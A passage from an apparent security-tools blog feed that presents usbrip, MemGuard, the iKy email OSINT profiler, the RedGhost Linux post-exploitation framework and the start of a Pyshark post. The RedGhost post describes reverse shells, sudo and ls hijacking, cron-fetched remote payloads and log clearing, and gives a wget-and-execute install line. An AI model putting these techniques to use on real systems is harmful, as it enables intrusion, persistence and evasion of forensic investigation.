<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/var/opt/usbrip/storage/ — </span>USB event storages: history.7z and violations.7z (created during the installation process);</li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/var/opt/usbrip/log/ — </span>usbrip logs (recommended to log usbrip activity when using crontab, see usbrip/cron/usbrip.cron);</li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/var/opt/usbrip/trusted/ —</span> list of trusted USB devices (created during the installation process);</li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/usr/local/bin/usbrip — </span>symlink to the /opt/usbrip/venv/bin/usbrip script.</li>
</ul>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">cron</span></h3>
<b>Cron jobs can be set as follows:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">~/usbrip$ sudo crontab -l > tmpcron && echo "" >> tmpcron</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">~/usbrip$ cat usbrip/cron/usbrip.cron | tee -a tmpcron</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">~/usbrip$ sudo crontab tmpcron</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">~/usbrip$ rm tmpcron</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">uninstall.sh</span></h3>
<b>To uninstall usbrip use:</b><br />
<br />
<span style="background-color: #eeeeee; color: #274e13; font-family: "courier new" , "courier" , monospace;">~/usbrip$ chmod +x ./installers/uninstall.sh</span><br />
<span style="background-color: #eeeeee; color: #274e13; font-family: "courier new" , "courier" , monospace;">~/usbrip$ sudo ./installers/uninstall.sh [-a/--all]</span><br />
<br />
When -a switch is enabled, not only the usbrip project directory is deleted, but also all the storages and usbrip logs are deleted too.<br />
<br />
And don't forget to remove the cron job.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Usage</span></h3>
<b>Synopsis</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"># ---------- BANNER ----------</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip banner</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Get usbrip banner.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"># ---------- EVENTS ----------</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip events history [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Get USB event history.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip events open <DUMP.JSON> [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Open USB event dump.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip events gen_auth <OUT_AUTH.JSON> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Generate a list of trusted (authorized) USB devices.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip events violations <IN_AUTH.JSON> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Get USB violation events based on the list of trusted devices.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"># ---------- STORAGE ----------</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip storage list <STORAGE_TYPE> [-q] [--debug]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">List contents of the selected storage (7zip archive). STORAGE_TYPE is "history" or "violations".</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip storage open <STORAGE_TYPE> [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-q] [--debug]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Open selected storage (7zip archive). Behaves similary to the EVENTS OPEN submodule.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip storage update <STORAGE_TYPE> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [--lvl <COMPRESSION_LEVEL>] [-q] [--debug]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Update storage — add USB events to the existing storage (7zip archive). COMPRESSION_LEVEL is a number in [0..9].</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip storage create <STORAGE_TYPE> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [--lvl <COMPRESSION_LEVEL>] [-q] [--debug]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Create storage — create 7zip archive and add USB events to it according to the selected options.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip storage passwd <STORAGE_TYPE> [--lvl <COMPRESSION_LEVEL>] [-q] [--debug]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Change password of the existing storage.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"># ---------- IDs ----------</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip ids search [--vid <VID>] [--pid <PID>] [--offline] [-q] [--debug]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Get extra details about a specific USB device by its <VID> and/or <PID> from the USB ID database.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip ids download [-q] [--debug]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Update (download) the USB ID database.</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Help</span></h3>
<b>To get a list of module names use:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip -h</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<b>To get a list of submodule names for a specific module use:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip <module> -h</span><br />
<br />
<b>To get a list of all switches for a specific submodule use:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip <module> <submodule> -h</span><br />
<h3 style="text-align: left;">
<span style="color: #073763;"><br />Examples</span></h3>
Show the event history of all USB devices, supressing banner output, info messages and user interaction <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">(-q, --quiet</span>), represented as a list (<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-l, --list</span>) with latest 100 entries (<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-n NUMBER, --number NUMBER</span>):<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip events history -ql -n 100</span><br />
<br />
Show the event history of the external USB devices (<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-e, --external</span>, which were actually disconnected) represented as a table (<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-t, --table</span>) containing "Connected", "VID", "PID", "Disconnected" and "Serial Number" columns (<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-c COLUMN [COLUMN], --column COLUMN [COLUMN]) filtered by date (-d DATE [DATE ...], --date DATE [DATE ...]</span>) with logs taken from the outer files (<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-f FILE [FILE ...], --file FILE [FILE ...</span>]):<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip events history -et -c conn vid pid disconn serial -d "Dec 9" "Dec 10" -f /var/log/syslog.1 /var/log/syslog.2.gz</span><br />
<br />
Build the event history of all USB devices and redirect the output to a file for further analysis. When the output stream is NOT terminal stdout (| or > for example) there would be no ANSI escape characters (color) in the output so feel free to use it that way. Also notice that usbrip uses some UNICODE symbols so it would be nice to convert the resulting file to UTF-8 encoding (with encov for example) as well as change newline characters to Windows style for portability (with awk for example):<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">usbrip history events -t | awk '{ sub("$", "\r"); print }' > usbrip.out && enconv -x UTF8 usbrip.out</span><br />
<br />
Remark: you can always get rid of the escape characters by yourself even if you have already got the output to stdout. To do that just copy the output data to usbrip.out and add one more awk instruction:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">awk '{ sub("$", "\r"); gsub("\\x1B\\[[0-?]*[ -/]*[@-~]", ""); print }' usbrip.out && enconv -x UTF8 usbrip.out</span><br />
<br />
Generate a list of trusted USB devices as a JSON-file (trusted/auth.json) with "VID" and "PID" attributes containing the first three devices connected on September 26:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip events gen_auth trusted/auth.json -a vid pid -n 3 -d "Sep 26"</span><br />
<br />
Search the event history of the external USB devices for violations based on the list of trusted USB devices <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">(trusted/auth.json</span>) by "PID" attribute, restrict resulting events to those which have "Bob" as a user, "EvilUSBManufacturer" as a manufacturer, "1234567890" as a serial number and represent the output as a table with "Connected", "VID" and "PID" columns:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip events violations trusted/auth.json -a pid -et --user Bob --manufact EvilUSBManufacturer --serial 1234567890 -c conn vid pid</span><br />
<br />
Search for details about a specific USB device by its VID (--vid VID) and PID (--pid PID):<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip ids search --vid 0781 --pid 5580</span><br />
<br />
Download the latest version of <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">usb_ids/usb.ids</span> database (the source is <a href="http://www.linux-usb.org/usb.ids" target="_blank">here</a>):<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip ids download</span><br />
<br />
<span style="font-size: large;"><a href="https://github.com/snovvcrash/usbrip" target="_blank">Download USBrip</a></span></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8244923499446330076.post-87967479505733356772019-07-28T18:44:00.002+05:302019-07-28T18:44:38.069+05:30MemGuard- Secure Software Enclave For Storage of Sensitive Information in Memory<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOTMsD_ciKYYx47u6q3AXsqG3t2tVbdTNFSSA_uXJfmCTSCxJJVanKrMoO6ZspcXBk-O-fz2ODaN5Y5BVzPQKEipDfiEwt-J8v9MbwIPrKwAuFUx7Vhhm_vetD058gL0kRaw3aPoMUBSm3/s1600/Secure+Software.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="440" data-original-width="748" height="376" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOTMsD_ciKYYx47u6q3AXsqG3t2tVbdTNFSSA_uXJfmCTSCxJJVanKrMoO6ZspcXBk-O-fz2ODaN5Y5BVzPQKEipDfiEwt-J8v9MbwIPrKwAuFUx7Vhhm_vetD058gL0kRaw3aPoMUBSm3/s640/Secure+Software.png" width="640" /></a></div>
<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">MemGuard- Secure Software Enclave For Storage of Sensitive Information in Memory</span></h3>
<br />
This package attempts to reduce the likelihood of sensitive data being exposed. It supports all major operating systems and is written in pure Go.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Features</span></h3>
<br />
<ul style="text-align: left;">
<li>Sensitive data is encrypted and authenticated in memory using xSalsa20 and Poly1305 respectively. The scheme also defends against cold-boot attacks.</li>
<li>Memory allocation bypasses the language runtime by using system calls to query the kernel for resources directly. This avoids interference from the garbage-collector.</li>
<li>Buffers that store plaintext data are fortified with guard pages and canary values to detect spurious accesses and overflows.</li>
<li>Effort is taken to prevent sensitive data from touching the disk. This includes locking memory to prevent swapping and handling core dumps.</li>
<li>Kernel-level immutability is implemented so that attempted modification of protected regions results in an access violation.</li>
<li>Multiple endpoints provide session purging and safe termination capabilities as well as signal handling to prevent remnant data being left behind.</li>
<li>Side-channel attacks are mitigated against by making sure that the copying and comparison of data is done in constant-time.</li>
<li>Accidental memory leaks are mitigated against by harnessing the garbage-collector to automatically destroy containers that have become unreachable.</li>
</ul>
<br />
Some features were inspired by <a href="https://github.com/jedisct1/libsodium" target="_blank">libsodium</a>, so credits to them.<br />
<br />
Full documentation and a complete overview of the API can be found <a href="https://godoc.org/github.com/awnumar/memguard" target="_blank">here</a>. Interesting and useful code samples can be found within the <a href="https://github.com/awnumar/memguard/blob/master/examples" target="_blank">examples</a> subpackage.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Installation</span></h3>
<span style="background-color: #f3f3f3; color: #274e13; font-family: Courier New, Courier, monospace;">$ go get github.com/awnumar/memguard</span><br />
<br />
We strongly encourage you to pin a specific version for a clean and reliable build. This can be accomplished using modules.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Contributing</span></h3>
<br />
<ul style="text-align: left;">
<li>Using the package and identifying points of friction.</li>
<li>Reading the source code and looking for improvements.</li>
<li>Adding interesting and useful program samples to ./examples.</li>
<li>Developing Proof-of-Concept attacks and mitigations.</li>
<li>Improving compatibility with more kernels and architectures.</li>
<li>Implementing kernel-specific and cpu-specific protections.</li>
<li>Writing useful security and crypto libraries that utilise memguard.</li>
<li>Submitting performance improvements or benchmarking code.</li>
</ul>
<br />
Issues are for reporting bugs and for discussion on proposals. Pull requests should be made against master.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Future goals</span></h3>
<br />
<ul style="text-align: left;">
<li>Ability to stream data to and from encrypted enclave objects.</li>
<li>Catch segmentation faults to wipe memory before crashing.</li>
<li>Evaluate and improve the strategies in place, particularly for <a href="https://github.com/awnumar/memguard/blob/master/core/coffer.go" target="_blank">Coffer</a> objects.</li>
<li>Formalise a threat model and evaluate our performance in regards to it.</li>
<li>Use lessons learned to apply patches upstream to the Go language and runtime.</li>
</ul>
<div>
<a href="https://github.com/awnumar/memguard" target="_blank"><span style="font-size: large;">Download MemGuard</span></a></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8244923499446330076.post-11872586563799904092019-07-22T13:52:00.002+05:302019-07-22T13:57:31.328+05:30iKy OSINT Project - To Collect Information From E-Mail With GUI<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9_5RIL9UrLvn9eqXbI4HUJx8xU885GOBgPeRbgTTChHIQD7W1uKmQ5exp9hFZXXata_2eqL5CaYJ-5afqjSXoRPK2GtlhZPk33yUYHPbGJnq1VpCaMWPn5eo-sD9204YaSSEW6dsJ1vJr/s1600/iKY+Project.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="429" data-original-width="705" height="389" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9_5RIL9UrLvn9eqXbI4HUJx8xU885GOBgPeRbgTTChHIQD7W1uKmQ5exp9hFZXXata_2eqL5CaYJ-5afqjSXoRPK2GtlhZPk33yUYHPbGJnq1VpCaMWPn5eo-sD9204YaSSEW6dsJ1vJr/s640/iKY+Project.png" width="640" /></a></div>
<br />
<h2 style="text-align: left;">
<span style="color: #073763;">iky OSINT Project. Collect information from a mail. Gather, Profile, Timeline.</span></h2>
<br />
Project iKy is to collects information from an email and shows results in a nice visual interface.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Installation</span></h3>
<div>
<span style="color: #073763;"><br /></span></div>
<b>Clone repository</b><br />
<b><br /></b>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">git clone https://gitlab.com/kennbroorg/iKy.git</span><br />
<h3 style="text-align: left;">
<span style="color: #073763;">Install Backend</span></h3>
<b><span style="color: #073763;">Redis</span></b><br />
<br />
<b>You must install Redis</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">wget http://download.redis.io/redis-stable.tar.gz</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">tar xvzf redis-stable.tar.gz</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">cd redis-stable</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">make</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">sudo make install</span><br />
<br />
<b>And turn on the server in a terminal</b><br />
<b><br /></b>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">redis-server</span><br />
<br />
<b>Python stuff and Celery</b><br />
<br />
You must install the libraries inside requirements.txt<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">pip install -r requirements.txt</span><br />
<br />
And turn on Celery in another terminal, within the directory backend<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">./celery.sh</span><br />
<br />
Finally, again, in another terminal turn on backend app from directory backend<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">python app.py</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Install Frontend</span></h3>
<b>Node</b><br />
<br />
First of all, install <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">nodejs</span>.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Dependencies</span></h3>
Inside the directory frontend install the dependencies<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">npm install</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Turn on Frontend Server</span></h3>
Finally, to run frontend server, execute:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">npm start</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<h3 style="text-align: left;">
<span style="color: #073763;">Browser</span></h3>
Open the browser in this <a href="http://127.0.0.1:4200/" target="_blank">url</a><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Config API Keys</span></h3>
Once the application is loaded in the browser, you should go to the Api Keys option and load the values of the APIs that are needed.<br />
<ul style="text-align: left;">
<li>Fullcontact: Generate the APIs from <a href="https://support.fullcontact.com/hc/en-us/articles/115003415888-Getting-Started-FullContact-v2-APIs" target="_blank">here</a></li>
<li>Twitter: Generate the APIs from <a href="https://developer.twitter.com/en/docs/basics/authentication/guides/access-tokens.html" target="_blank">here</a></li>
<li>Linkedin: Only the user and password of your account must be loaded</li>
</ul>
<div>
<h3 style="text-align: left;">
<span style="color: #073763;">Video Demo</span></h3>
</div>
<div>
<iframe allowfullscreen="" frameborder="0" height="360" src="https://player.vimeo.com/video/326114716" title="vimeo-player" width="640"></iframe>
<br />
<div>
<br /></div>
<div>
<br /></div>
<div>
<span style="font-size: large;"><a href="https://github.com/kennbroorg/iKy" target="_blank">Download iKY Project</a></span></div>
</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8244923499446330076.post-74272745568898240952019-07-19T14:00:00.000+05:302019-10-21T17:53:59.549+05:30RedGhost - Linux Post Exploitation Framework<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjV8256m_wp4G7b5QIvVzJ2LC5It3j_tTMK2OOAOckIwp8ifC_0zC5ib3MOm2YZv6TTJlaSFr4nuC83JFv9BJmiS0lOHBqHDPjBFzsfvhXXRl-c5LiKmBf981enT21Ttx0h5Doo4sEuPSHs/s1600/RedGhost.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="RedGhost - Linux Post Exploitation Framework" border="0" data-original-height="582" data-original-width="1080" height="344" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjV8256m_wp4G7b5QIvVzJ2LC5It3j_tTMK2OOAOckIwp8ifC_0zC5ib3MOm2YZv6TTJlaSFr4nuC83JFv9BJmiS0lOHBqHDPjBFzsfvhXXRl-c5LiKmBf981enT21Ttx0h5Doo4sEuPSHs/s640/RedGhost.png" title="RedGhost - Linux Post Exploitation Framework" width="640" /></a></div>
<br />
<h2 style="text-align: left;">
<span style="color: #073763;">RedGhost- Linux post exploitation framework </span></h2>
<h3 style="text-align: left;">
<span style="color: #073763;"><br />It has designed to assist red teams in persistence, reconnaissance, privilege escalation and leaving no trace. </span></h3>
<br />
<ul style="text-align: left;">
<li><b>Payloads</b></li>
</ul>
Function to generate various encoded reverse shells in netcat, bash, python, php, ruby, perl<br />
<br />
<ul style="text-align: left;">
<li><b>SudoInject</b></li>
</ul>
Function to inject sudo command with wrapper function to run a reverse root shell everytime "sudo" is run for privilege escalataion<br />
<br />
<ul style="text-align: left;">
<li><b>lsInject</b></li>
</ul>
Function to inject the "ls" command with a wrapper function to run payload everytime "ls" is run for persistence<br />
<br />
<ul style="text-align: left;">
<li><b>Crontab</b></li>
</ul>
Function to create cron job that downloads payload from remote server and runs payload every minute for persistence<br />
<br />
<ul style="text-align: left;">
<li><b>GetRoot</b></li>
</ul>
Function to try various methods to escalate privileges<br />
<br />
<ul style="text-align: left;">
<li><b>Clearlogs</b></li>
</ul>
Function to clear logs and make investigation with forensics difficult<br />
<br />
<ul style="text-align: left;">
<li><b>MassInfoGrab</b></li>
</ul>
Function to grab mass reconaissance/information on system<br />
<br />
<ul style="text-align: left;">
<li><b>CheckVM</b></li>
</ul>
Function to check if the system is a virtual machine<br />
<br />
<ul style="text-align: left;">
<li><b>MemoryExec</b></li>
</ul>
Function to execute remote bash script in memory<br />
<br />
<ul style="text-align: left;">
<li><b>BanIp</b></li>
</ul>
Function to BanIp using iptables<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Installation</span></h3>
<b>Install RedGhost in one line code:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; ./redghost.sh</span><br />
<br />
<b>One line code to Install prerequisites and RedGhost :</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; apt-get install dialog; apt-g</span><br />
<br />
<span style="font-size: large;"><a href="https://github.com/d4rk007/RedGhost" target="_blank">Download Redghost</a></span></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8244923499446330076.post-39079112190969562172019-07-16T19:49:00.002+05:302019-07-16T19:50:35.272+05:30Pyshark- To Allowing Python Packet Parsing Using Wireshark Dissectors<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnHjJVdgUvq7pJmnbolkQPi0ISUef_BxGPx16RNwUySuwEPNMLxzXF3m0LXilufa22idb_JffKdwupLHnI1XZw86-TJ1izl71MRlnN2uOzGgtzEExexpsWnaPX2RwM84LS6OzcC0AuLnaK/s1600/Pyshark.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="387" data-original-width="606" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnHjJVdgUvq7pJmnbolkQPi0ISUef_BxGPx16RNwUySuwEPNMLxzXF3m0LXilufa22idb_JffKdwupLHnI1XZw86-TJ1izl71MRlnN2uOzGgtzEExexpsWnaPX2RwM84LS6OzcC0AuLnaK/s1600/Pyshark.png" /></a></div>
<h2 style="text-align: left;">
<span style="color: #073763;"><br /></span></h2>
<h2 style="text-align: left;">
<span style="color: #073763;">Python wrapper for tshark, allowing python packet parsing using Wireshark dissectors.</span></h2>
<br />
